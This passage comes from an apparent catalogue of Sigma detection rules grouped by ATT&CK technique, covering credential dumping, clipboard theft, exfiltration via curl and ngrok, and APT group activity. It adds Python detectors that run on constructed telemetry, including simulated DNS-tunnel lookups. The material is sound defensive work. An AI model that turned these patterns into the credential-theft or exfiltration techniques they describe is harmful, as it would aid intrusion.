    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
  • GALLIUM Artefacts - Builtin - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
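The DNSCat2 description above is a counting detection rather than a string match: one PowerShell process spawning nslookup hundreds of times in a short period. The following is an added example (not part of the SigmaTACT report or of the Sigma rule, which only matches the parent/child pair) of that count as a sliding-window burst detector over constructed Sysmon Event ID 1 style process-creation events. The threshold (50) and window (60 s) are assumptions chosen for the example, as is the assumed nslookup argument layout used to recover the queried domain; tune both to the host population, since a single admin running a few lookups from a PowerShell prompt must not fire.

```python
"""Added example (not part of the SigmaTACT report or the Sigma project).

Implements the "count nslookup processes spawned by PowerShell" idea of the
DNSCat2 rule above as a sliding-window burst detector over constructed
process-creation events (Sysmon Event ID 1 style fields).  The threshold and
window are assumptions chosen for the example; tune them per host population.
"""
from __future__ import annotations

from collections import defaultdict, deque
from datetime import datetime, timedelta

POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe"}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _queried_name(cmdline: str) -> str | None:
    """First non-option argument of an nslookup command line, e.g.
    'nslookup -type=TXT 0a1b.tunnel.example 203.0.113.53' -> '0a1b.tunnel.example'."""
    args = [t for t in cmdline.split()[1:] if not t.startswith("-")]
    return args[0].lower() if args else None


def detect_nslookup_bursts(events: list[dict], threshold: int = 50,
                           window: timedelta = timedelta(seconds=60)) -> list[dict]:
    """Alert once per (host, parent PID) when at least `threshold` nslookup.exe
    children of PowerShell start within `window`."""
    recent: dict[tuple, deque] = defaultdict(deque)   # start times inside the window
    names: dict[tuple, set] = defaultdict(set)        # queried names per parent
    fired: set[tuple] = set()
    alerts: list[dict] = []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        if _basename(ev["Image"]) != "nslookup.exe" or _basename(ev["ParentImage"]) not in POWERSHELL_HOSTS:
            continue
        key = (ev["Computer"], ev["ParentProcessId"])
        q = recent[key]
        q.append(ev["UtcTime"])
        while q and ev["UtcTime"] - q[0] > window:   # drop lookups older than the window
            q.popleft()
        name = _queried_name(ev.get("CommandLine", ""))
        if name:
            names[key].add(name)
        if len(q) >= threshold and key not in fired:
            fired.add(key)
            alerts.append({
                "host": key[0], "parent_pid": key[1], "count": len(q),
                "window_start": q[0], "window_end": ev["UtcTime"],
                "distinct_names": len(names[key]),
                # strip the data-carrying first label to expose the C2 domain(s)
                "domains": sorted({n.split(".", 1)[1] for n in names[key] if "." in n}),
            })
    return alerts


def make_events() -> list[dict]:
    """Constructed sample telemetry (not real logs)."""
    base = datetime(2024, 1, 1, 12, 0, 0)
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    nsl = r"C:\Windows\System32\nslookup.exe"
    events = []
    # HOST-A: one PowerShell process spawning 120 TXT lookups in 30 s (dnscat2-like)
    for i in range(120):
        events.append({"Computer": "HOST-A", "UtcTime": base + timedelta(milliseconds=250 * i),
                       "Image": nsl, "ParentImage": ps, "ParentProcessId": 4242,
                       "CommandLine": f"nslookup -type=TXT {i:08x}.tunnel.example 203.0.113.53"})
    # HOST-B: an admin running three lookups by hand from a PowerShell prompt
    for i in range(3):
        events.append({"Computer": "HOST-B", "UtcTime": base + timedelta(minutes=i),
                       "Image": nsl, "ParentImage": ps, "ParentProcessId": 900,
                       "CommandLine": "nslookup intranet.example"})
    # HOST-C: a cmd.exe batch loop; out of scope because the parent is not PowerShell
    for i in range(200):
        events.append({"Computer": "HOST-C", "UtcTime": base + timedelta(seconds=i),
                       "Image": nsl, "ParentImage": r"C:\Windows\System32\cmd.exe",
                       "ParentProcessId": 77, "CommandLine": "nslookup host.example"})
    return events


if __name__ == "__main__":
    for alert in detect_nslookup_bursts(make_events()):
        print(alert)
```

Only HOST-A fires, at the 50th lookup, and the alert carries the C2 domain derived from the queried names rather than the per-query hex labels, which is what an analyst needs to pivot on. Keying the window on the parent PID rather than the host alone keeps two unrelated PowerShell sessions from being summed together.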
attack.g0010 8
Show Rules (8)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects a suspicious Microsoft certutil execution with sub-commands such as 'decode', which is sometimes used to decode malicious code
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Turla Group Commands May 2020 - Level: critical
    Description: Detects commands used by Turla group as reported by ESET in May 2020
  • Turla Group Named Pipes - Level: critical
    Description: Detects a named pipe used by Turla group samples
  • Turla Service Install - Level: high
    Description: Detects the installation of malicious services mentioned in ESET's Carbon Paper - Turla report
  • Turla PNG Dropper Service - Level: critical
    Description: Detects malicious services mentioned in the Turla PNG dropper report published by NCC Group in November 2018
  • ComRAT Network Communication - Level: high
    Description: Detects Turla ComRAT network communication.
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
attack.t1115 8
Show Rules (8)
  • Clipboard Collection with Xclip Tool - Auditd - Level: low
    Description: Detects attempts to collect data stored in the clipboard from users with the xclip tool. xclip has to be installed. Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations.
  • Clipboard Collection of Image Data with Xclip Tool - Level: low
    Description: Detects attempts to collect image data stored in the clipboard from users with the xclip tool. xclip has to be installed. Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations.
  • Clipboard Collection with Xclip Tool - Level: low
    Description: Detects attempts to collect data stored in the clipboard from users with the xclip tool. xclip has to be installed. Using this rule on servers is highly recommended, since clipboard utilities are heavily used on user workstations.
  • Clipboard Data Collection Via OSAScript - Level: high
    Description: Detects possible collection of data from the clipboard via execution of the osascript binary
  • PowerShell Get Clipboard - Level: medium
    Description: A general detection for Get-Clipboard commands in PowerShell logs, which could be an adversary capturing clipboard contents.
  • Data Copied To Clipboard Via Clip.EXE - Level: low
    Description: Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
  • PowerShell Get-Clipboard Cmdlet Via CLI - Level: medium
    Description: Detects usage of the 'Get-Clipboard' cmdlet via CLI
  • Clipboard Data Collection Via Pbpaste - Level: medium
    Description: Detects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
attack.t1555 8
Show Rules (8)
  • DPAPI Backup Keys And Certificate Export Activity IOC - Level: high
    Description: Detects file names with specific patterns seen generated and used by tools such as Mimikatz and DSInternals related to exported or stolen DPAPI backup keys and certificates.
  • Dump Credentials from Windows Credential Manager With PowerShell - Level: medium
    Description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
  • Enumerate Credentials from Windows Credential Manager With PowerShell - Level: medium
    Description: Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
  • HackTool - WinPwn Execution - ScriptBlock - Level: high
    Description: Detects script block text keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • HackTool - SecurityXploded Execution - Level: critical
    Description: Detects the execution of SecurityXploded Tools
  • HackTool - WinPwn Execution - Level: high
    Description: Detects command-line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
  • Suspicious Serv-U Process Pattern - Level: high
    Description: Detects a suspicious process pattern which could be a sign of an exploited Serv-U service
  • Stored Credentials in Fake Files - Level: high
    Description: Detects access to fake (decoy) files that appear to contain stored credentials
attack.t1135 8
Show Rules (8)
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell - Level: high
    Description: Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
  • HackTool - SharpView Execution - Level: high
    Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
  • PUA - Advanced IP Scanner Execution - Level: medium
    Description: Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
  • PUA - Advanced Port Scanner Execution - Level: medium
    Description: Detects the use of Advanced Port Scanner.
  • Turla Group Lateral Movement - Level: critical
    Description: Detects automated lateral movement by Turla group
  • Potential Dridex Activity - Level: critical
    Description: Detects potential Dridex activity via specific process patterns
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
  • Automated Turla Group Lateral Movement - Level: medium
    Description: Detects automated lateral movement by Turla group
attack.s0005 7
Show Rules (7)
  • Credential Dumping Tools Service Execution - Level: critical
    Description: Detects well-known credential dumping tools execution via service execution events
  • Credential Dumping Tools Service Execution - Security - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • WCE wceaux.dll Access - Level: critical
    Description: Detects access to wceaux.dll during WCE pass-the-hash remote command execution on the source host
  • Credential Dumping Tools Service Execution - System - Level: high
    Description: Detects well-known credential dumping tools execution via service execution events
  • Password Dumper Remote Thread in LSASS - Level: high
    Description: Detects password dumper activity by monitoring remote thread creation (Sysmon Event ID 8) with lsass.exe as the TargetImage. The process named in the source-process field is the malicious program. A single execution can lead to hundreds of events.
  • HackTool - Windows Credential Editor (WCE) Execution - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
  • Windows Credential Editor Registry - Level: critical
    Description: Detects the use of Windows Credential Editor (WCE)
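The "Password Dumper Remote Thread in LSASS" description above warns that one dumper run produces hundreds of Sysmon Event ID 8 records, so a per-event alert floods the queue. The following is an added example (not part of the SigmaTACT report or of the Sigma rule itself) that collapses those records into one summary per source process, keeping the first/last time, thread count and reported start functions, and skips an allow-list of source images. The allow-list entries are assumptions for this example (a real one must be built from the security products observed injecting into lsass on the estate), the "user-writable path" markers are likewise assumed, and all events are constructed.

```python
"""Added example (not part of the SigmaTACT report or the Sigma project).

Collapses the burst of Sysmon Event ID 8 (CreateRemoteThread) records that one
credential-dumper run produces against lsass.exe into a single summary per
source process, as the "Password Dumper Remote Thread in LSASS" rule above
warns is necessary.  The allow-list and path markers are assumptions for this
example; all events are constructed.
"""
from __future__ import annotations

from datetime import datetime, timedelta

ALLOWED_SOURCE_IMAGES = {                     # assumed; lower-case full paths
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\programdata\\")   # assumed


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def summarize_lsass_remote_threads(events: list[dict]) -> list[dict]:
    """One summary per (host, source PID, source image) for EID 8 events whose
    TargetImage is lsass.exe and whose SourceImage is not allow-listed."""
    summaries: dict[tuple, dict] = {}
    for ev in events:
        if ev.get("EventID") != 8 or _basename(ev.get("TargetImage", "")) != "lsass.exe":
            continue
        src = ev.get("SourceImage", "").lower()
        if src in ALLOWED_SOURCE_IMAGES:
            continue
        key = (ev["Computer"], ev["SourceProcessId"], src)
        s = summaries.get(key)
        if s is None:
            s = summaries[key] = {
                "host": ev["Computer"], "source_image": ev["SourceImage"],
                "source_pid": ev["SourceProcessId"], "target_pid": ev["TargetProcessId"],
                "first_seen": ev["UtcTime"], "last_seen": ev["UtcTime"],
                "thread_count": 0, "start_functions": set(),
                # a dumper dropped to a user-writable path is the common case
                "user_writable_source": any(m in src for m in USER_WRITABLE_MARKERS),
            }
        s["thread_count"] += 1
        s["first_seen"] = min(s["first_seen"], ev["UtcTime"])
        s["last_seen"] = max(s["last_seen"], ev["UtcTime"])
        if ev.get("StartFunction"):
            s["start_functions"].add(ev["StartFunction"])
    return list(summaries.values())


def make_events() -> list[dict]:
    """Constructed sample telemetry (not real logs)."""
    base = datetime(2024, 1, 1, 9, 30, 0)
    lsass = r"C:\Windows\System32\lsass.exe"
    events = []
    for i in range(300):   # one dumper run: a burst of remote threads into lsass
        events.append({"EventID": 8, "Computer": "WS-17", "UtcTime": base + timedelta(milliseconds=5 * i),
                       "SourceImage": r"C:\Users\bob\AppData\Local\Temp\dump.exe", "SourceProcessId": 5120,
                       "TargetImage": lsass, "TargetProcessId": 712,
                       "StartFunction": "LoadLibraryA" if i % 2 else ""})
    # allow-listed OS component touching lsass: dropped
    events.append({"EventID": 8, "Computer": "WS-17", "UtcTime": base, "SourceImage": r"C:\Windows\System32\csrss.exe",
                   "SourceProcessId": 640, "TargetImage": lsass, "TargetProcessId": 712, "StartFunction": ""})
    # remote thread into a different target: out of scope for this rule
    events.append({"EventID": 8, "Computer": "WS-17", "UtcTime": base, "SourceImage": r"C:\Windows\System32\svchost.exe",
                   "SourceProcessId": 1300, "TargetImage": r"C:\Windows\System32\svchost.exe",
                   "TargetProcessId": 1400, "StartFunction": ""})
    return events


if __name__ == "__main__":
    for summary in summarize_lsass_remote_threads(make_events()):
        print(summary)
```

The 300 records collapse into one summary naming dump.exe (PID 5120), its 1.5 s activity span and the "LoadLibraryA" start function, which is the shape of alert an analyst can act on. Note that the allow-list is matched on the full lower-cased path, not the basename, so a dumper renamed csrss.exe in a user's Temp folder is still reported.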
attack.t1212 7
Show Rules (7)
  • GALLIUM Artefacts - Level: high
    Description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
  • Guacamole Two Users Sharing Session Anomaly - Level: high
    Description: Detects suspicious session with two users present
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API while a known vulnerability is being exploited. Microsoft started using this log in January 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
  • Kerberos Manipulation - Level: high
    Description: Detects a failed Kerberos TGT issuance, which can be a sign of an attacker manipulating TGT messages.
  • Suspicious NTLM Authentication on the Printer Spooler Service - Level: high
    Description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service
  • GALLIUM IOCs - Level: high
    Description: Detects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
  • Possible Remote Password Change Through SAMR - Level: medium
    Description: Detects a possible remote NTLM hash change through the SAMR API SamiChangePasswordUser() or SamSetInformationUser(). "Audit User Account Management" in "Advanced Audit Policy Configuration" has to be enabled in your local security policy / GPO to see these events.
attack.t1213 7
Show Rules (7)
  • OpenCanary - GIT Clone Request - Level: high
    Description: Detects instances where a Git service on an OpenCanary node has received a Git clone request.
  • OpenCanary - MSSQL Login Attempt Via SQLAuth - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
  • OpenCanary - MSSQL Login Attempt Via Windows Authentication - Level: high
    Description: Detects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
  • OpenCanary - MySQL Login Attempt - Level: high
    Description: Detects instances where a MySQL service on an OpenCanary node has had a login attempt.
  • OpenCanary - REDIS Action Command Attempt - Level: high
    Description: Detects instances where a REDIS service on an OpenCanary node has had an action command attempted.
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
attack.t1123 7
Show Rules (7)
  • OpenCanary - SIP Request - Level: high
    Description: Detects instances where a SIP service on an OpenCanary node has received a SIP request.
  • Audio Capture - Level: low
    Description: Detects attempts to record audio with arecord utility
  • Linux Capabilities Discovery - Level: low
    Description: Detects attempts to discover files with setuid/setgid capabilities, which would allow an adversary to escalate privileges.
  • Processes Accessing the Microphone and Webcam - Level: medium
    Description: Detects processes accessing the microphone and webcam on an endpoint, which may indicate adversary activity.
  • Audio Capture via PowerShell - Level: medium
    Description: Detects audio capture via PowerShell Cmdlet.
  • Audio Capture via SoundRecorder - Level: medium
    Description: Detects an attacker collecting audio via the SoundRecorder application.
  • Suspicious Camera and Microphone Access - Level: high
    Description: Detects Processes accessing the camera and microphone from suspicious folder
attack.t1567 7
Show Rules (7)
  • Communication To Ngrok Tunneling Service - Linux - Level: high
    Description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of data exfiltration by malicious actors
  • Suspicious Curl File Upload - Linux - Level: medium
    Description: Detects a suspicious curl process start that adds a file to a web request
  • Monero Crypto Coin Mining Pool Lookup - Level: high
    Description: Detects suspicious DNS queries to Monero mining pools
  • Communication To Ngrok Tunneling Service Initiated - Level: high
    Description: Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers have been seen using ngrok to host their second-stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of either data exfiltration by malicious actors or an additional download.
  • Arbitrary File Download Via ConfigSecurityPolicy.EXE - Level: medium
    Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary that is part of Windows Defender and is used to manage its settings. Users can configure different pilot collections for each of the co-management workloads. It can be abused by attackers to upload or download files.
  • LOLBAS Data Exfiltration by DataSvcUtil.exe - Level: medium
    Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
  • Potential Data Exfiltration Via Curl.EXE - Level: medium
    Description: Detects the execution of the "curl" process with "upload" flags, which might indicate potential data exfiltration.
attack.t1057 7
Show Rules (7)
  • Cisco Discovery - Level: low
    Description: Detects commands that find information about network devices which is not stored in config files.
  • Suspicious Process Discovery With Get-Process - Level: low
    Description: Detects use of the Get-Process cmdlet, which gets the processes that are running on the local computer.
  • Recon Command Output Piped To Findstr.EXE - Level: medium
    Description: Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" flags, for example. Attackers often use this technique to extract the specific information they require during their reconnaissance phase.
  • HackTool - PCHunter Execution - Level: high
    Description: Detects suspicious use of PCHunter, a tool similar to Process Hacker for viewing and manipulating processes, kernel options and other low-level system internals.
  • Process Discovery - Level: low
    Description: Detects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • Suspicious Tasklist Discovery Command - Level: informational
    Description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
  • Silence.Downloader V3 - Level: high
    Description: Detects Silence downloader. These commands are hardcoded into the binary.
attack.t1547 7
Show Rules (7)
  • Startup/Logon Script Added to Group Policy Object - Level: medium
    Description: Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
  • Potential RipZip Attack on Startup Folder - Level: high
    Description: Detects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, explorer expands the malicious ZIP file and drops a malicious shortcut pointing to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in the Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D}, the CLSID of the folder shortcut operation.
  • Suspicious Driver Install by pnputil.exe - Level: medium
    Description: Detects when a potentially suspicious driver is being installed via the pnputil.exe LOLBIN.
  • Suspicious GrpConv Execution - Level: high
    Description: Detects suspicious execution of GrpConv, a utility to convert Windows 3.x .grp files, which can also be used for persistence by malicious software or actors.
  • Registry Persistence Mechanisms in Recycle Bin - Level: high
    Description: Detects persistence registry keys for Recycle Bin
  • WINEKEY Registry Modification - Level: high
    Description: Detects potential malicious modification of run keys by winekey or team9 backdoor
  • Atbroker Registry Change - Level: medium
    Description: Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'
attack.g0049 6
Show Rules (6)
  • Suspicious Certutil Command Usage - Level: high
    Description: Detects suspicious Microsoft certutil execution with sub-commands such as 'decode', which is sometimes used to decode malicious code.
  • OilRig APT Activity - Level: critical
    Description: Detects OilRig activity as reported by Nyotron in their March 2018 report
  • OilRig APT Registry Persistence - Level: critical
    Description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - Security - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • OilRig APT Schedule Task Persistence - System - Level: critical
    Description: Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
  • Greenbug Espionage Group Indicators - Level: critical
    Description: Detects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
attack.g0046 6
Show Rules (6)
  • Renamed PaExec Execution - Level: medium
    Description: Detects execution of a renamed PAExec via its Imphash and executable product string.
  • Suspicious Binary In User Directory Spawned From Office Application - Level: high
    Description: Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)
  • Potential APT FIN7 Related PowerShell Script Created - Level: high
    Description: Detects PowerShell script file creation with specific name or suffix which was seen being used often by FIN7 PowerShell scripts
  • Potential APT FIN7 POWERHOLD Execution - Level: high
    Description: Detects execution of the POWERHOLD script seen used by FIN7 as reported by WithSecureLabs
  • Potential POWERTRASH Script Execution - Level: high
    Description: Detects potential execution of the PowerShell script POWERTRASH
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity - Level: high
    Description: Detects specific command line execution used by FIN7 as reported by WithSecureLabs for reconnaissance and POWERTRASH execution
attack.t1537 6
Show Rules (6)
  • AWS EC2 VM Export Failure - Level: low
    Description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
  • AWS S3 Data Management Tampering - Level: low
    Description: Detects when a user tampers with S3 data management in Amazon Web Services.
  • AWS Snapshot Backup Exfiltration - Level: medium
    Description: Detects the modification of an EC2 snapshot's permissions to enable access from another account
  • Github Fork Private Repositories Setting Enabled/Cleared - Level: medium
    Description: Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
  • Github Repository/Organization Transferred - Level: medium
    Description: Detects when a repository or an organization is being transferred to another location.
  • Data Exfiltration to Unsanctioned Apps - Level: medium
    Description: Detects when Microsoft Cloud App Security reports that a user or IP address used an app that is not sanctioned to perform an activity that resembles an attempt to exfiltrate information from your organization.
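The "AWS Snapshot Backup Exfiltration" entry above checks for an EC2 snapshot's permissions being modified to grant another account access. The following Python is an added example, not code from this report or from the Sigma project: it applies that check to CloudTrail records, where the grantees of a ModifySnapshotAttribute call appear under requestParameters.createVolumePermission.add.items. The sample records, account IDs and snapshot IDs are constructed, and the trusted-account set is an assumption.

```python
"""Flag EC2 snapshots shared outside an account allowlist (added example).

A ModifySnapshotAttribute call lists the accounts being granted access under
requestParameters.createVolumePermission.add.items; the special group "all"
makes the snapshot public.
"""
from typing import Dict, Iterable, List, Set, Tuple

# Accounts this organisation owns; anything else is a sharing finding (assumption).
TRUSTED_ACCOUNTS: Set[str] = {"111111111111", "222222222222"}

# Constructed sample CloudTrail records; IDs are placeholders, not real resources.
SAMPLE_EVENTS: List[Dict] = [
    {   # share with an account outside the allowlist
        "eventSource": "ec2.amazonaws.com",
        "eventName": "ModifySnapshotAttribute",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/alice"},
        "requestParameters": {
            "snapshotId": "snap-0aaaaaaaaaaaaaaa1",
            "attributeType": "CREATE_VOLUME_PERMISSION",
            "createVolumePermission": {"add": {"items": [{"userId": "999999999999"}]}},
        },
    },
    {   # make a snapshot public
        "eventSource": "ec2.amazonaws.com",
        "eventName": "ModifySnapshotAttribute",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/alice"},
        "requestParameters": {
            "snapshotId": "snap-0bbbbbbbbbbbbbbb2",
            "attributeType": "CREATE_VOLUME_PERMISSION",
            "createVolumePermission": {"add": {"items": [{"group": "all"}]}},
        },
    },
    {   # share with a trusted account: benign
        "eventSource": "ec2.amazonaws.com",
        "eventName": "ModifySnapshotAttribute",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/bob"},
        "requestParameters": {
            "snapshotId": "snap-0ccccccccccccccc3",
            "attributeType": "CREATE_VOLUME_PERMISSION",
            "createVolumePermission": {"add": {"items": [{"userId": "222222222222"}]}},
        },
    },
    {   # revoking access is not a sharing event
        "eventSource": "ec2.amazonaws.com",
        "eventName": "ModifySnapshotAttribute",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/bob"},
        "requestParameters": {
            "snapshotId": "snap-0aaaaaaaaaaaaaaa1",
            "attributeType": "CREATE_VOLUME_PERMISSION",
            "createVolumePermission": {"remove": {"items": [{"userId": "999999999999"}]}},
        },
    },
    {   # unrelated API call
        "eventSource": "ec2.amazonaws.com",
        "eventName": "DescribeSnapshots",
        "userIdentity": {"arn": "arn:aws:iam::111111111111:user/bob"},
        "requestParameters": {},
    },
]


def snapshot_sharing_findings(events: Iterable[Dict],
                              trusted: Set[str] = TRUSTED_ACCOUNTS) -> List[Tuple[str, str, str, str]]:
    """Return (snapshotId, grantee, level, actor) for every grant to an untrusted party."""
    findings = []
    for ev in events:
        if ev.get("eventSource") != "ec2.amazonaws.com" or ev.get("eventName") != "ModifySnapshotAttribute":
            continue
        params = ev.get("requestParameters") or {}
        perm = params.get("createVolumePermission") or {}
        added = (perm.get("add") or {}).get("items") or []   # only "add" grants access
        actor = (ev.get("userIdentity") or {}).get("arn", "unknown")
        for item in added:
            if item.get("group") == "all":
                findings.append((params.get("snapshotId", "?"), "all", "high", actor))
            elif item.get("userId") and item["userId"] not in trusted:
                findings.append((params.get("snapshotId", "?"), item["userId"], "medium", actor))
    return findings


if __name__ == "__main__":
    for snap, grantee, level, actor in snapshot_sharing_findings(SAMPLE_EVENTS):
        print(f"[{level}] {snap} shared with {grantee} by {actor}")
```

Grants to the account's own IDs are deliberately dropped so routine cross-account backups do not page anyone; removing a permission never produces a finding.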
attack.t1201 6
Show Rules (6)
  • Password Policy Discovery - Linux - Level: low
    Description: Detects password policy discovery commands
  • Cisco Discovery - Level: low
    Description: Detects commands that find information about network devices which is not stored in config files.
  • Password Policy Enumerated - Level: medium
    Description: Detects when the password policy is enumerated.
  • Password Policy Discovery With Get-AdDefaultDomainPasswordPolicy - Level: low
    Description: Detects PowerShell activity in which Get-ADDefaultDomainPasswordPolicy is used to get the default password policy for an Active Directory domain.
  • HackTool - CrackMapExec Execution - Level: high
    Description: This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
  • Net.EXE Execution - Level: low
    Description: Detects execution of "Net.EXE".
attack.t1587 6
Show Rules (6)
  • Program Executions in Suspicious Folders - Level: medium
    Description: Detects program executions in suspicious non-program folders related to malware or hacking activity
  • Linux HackTool Execution - Level: high
    Description: Detects known hacktool execution based on image name.
  • HackTool - PurpleSharp Execution - Level: critical
    Description: Detects the execution of the PurpleSharp adversary simulation tool
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
  • Suspicious Word Cab File Write CVE-2021-40444 - Level: high
    Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
  • FoggyWeb Backdoor DLL Loading - Level: critical
    Description: Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll".
attack.t1529 6
Show Rules (6)
  • System Shutdown/Reboot - Linux - Level: informational
    Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
  • System Shutdown/Reboot - MacOs - Level: informational
    Description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
  • Cisco Denial of Service - Level: medium
    Description: Detect a system being shutdown or put into different boot mode
  • Silence.EDA Detection - Level: critical
    Description: Detects Silence EmpireDNSAgent as described in the Group-IB report.
  • Suspicious Execution of Shutdown - Level: medium
    Description: Detects use of the command line to shut down or reboot Windows.
  • Suspicious Execution of Shutdown to Log Out - Level: medium
    Description: Detects the rare use of the command line tool shutdown to log off a user.
attack.t1496 6
Show Rules (6)
  • Linux Crypto Mining Pool Connections - Level: high
    Description: Detects process connections to a Monero crypto mining pool
  • Linux Crypto Mining Indicators - Level: high
    Description: Detects command line parameters or strings often used by crypto miners
  • Monero Crypto Coin Mining Pool Lookup - Level: high
    Description: Detects suspicious DNS queries to Monero mining pools
  • DNS Events Related To Mining Pools - Level: low
    Description: Identifies clients that may be performing DNS lookups associated with common currency mining pools.
  • Network Communication With Crypto Mining Pool - Level: high
    Description: Detects initiated network connections to crypto mining pools
  • Potential Crypto Mining Activity - Level: high
    Description: Detects command line parameters or strings often used by crypto miners
attack.t1571 6
Show Rules (6)
  • Potentially Suspicious Malware Callback Communication - Linux - Level: high
    Description: Detects programs that connect to known malware callback ports based on threat intelligence reports.
  • Suspicious DNS Z Flag Bit Set - Level: medium
    Description: The DNS Z flag is a bit in the DNS protocol header that, per the IETF design, is reserved (unused). Although it has recently been used alongside DNSSEC, a value other than 0 should be rare. If it is set to non-zero and DNSSEC is in use, excluding the legitimate domains is low effort and high reward. Determine whether multiple of these events occurred in a short period of time to establish whether this was a one-off or part of a larger pattern. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs
  • Potentially Suspicious Malware Callback Communication - Level: high
    Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
  • Communication To Uncommon Destination Ports - Level: medium
    Description: Detects programs that connect to uncommon destination ports
  • Testing Usage of Uncommonly Used Port - Level: medium
    Description: Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 (Citation: Symantec Elfin Mar 2019) or port 587 (Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.
  • Suspicious Werfault.exe Network Connection Outbound - Level: medium
    Description: Adversaries can migrate Cobalt Strike/Metasploit/C2 beacons on compromised systems into the legitimate werfault.exe process to avoid detection.
attack.t1570 6
Show Rules (6)
